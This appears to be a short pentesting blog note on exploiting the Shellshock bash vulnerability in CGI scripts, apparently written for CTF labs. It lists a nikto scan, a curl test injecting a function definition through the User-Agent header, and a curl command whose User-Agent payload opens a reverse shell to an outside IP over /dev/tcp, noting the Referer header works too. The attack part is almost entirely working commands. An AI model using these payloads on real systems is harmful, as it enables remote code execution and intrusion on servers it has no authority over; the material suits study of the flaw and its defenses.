Shellshock
Post

Shellshock

12/08/2022 31/03/2023
shuciran
1

Finding the Vulnerability

First you need to find a script (.sh,.pl,.cgi,etc.), most commonly under cgi-bin folder, for this task the best tool is nikto:

1

nikto -h <IP>

Testing the Vulnerability

If we receive the “vulnerable” output the server is vulnerable

1
2

kali@kali#~ curl -H "User-agent: () { :;}; echo; echo vulnerable" http://10.0.30.121/cgi-bin/uptime
vulnerable

User-Agent

Next with curl we can abuse of the legacy version of outdated bash which accepts some payloads:

1

curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.1.250/1234 0>&1" http://10.0.30.121/cgi-bin/uptime

Examples: ECHO CTF legacy

It is possible to abuse this vulnerability on HTTP Header “Referer” instead of “User-Agent”.

References

cgi-bin Exploitation

06 Exploitation, Shellshock
exploitation rce shellshock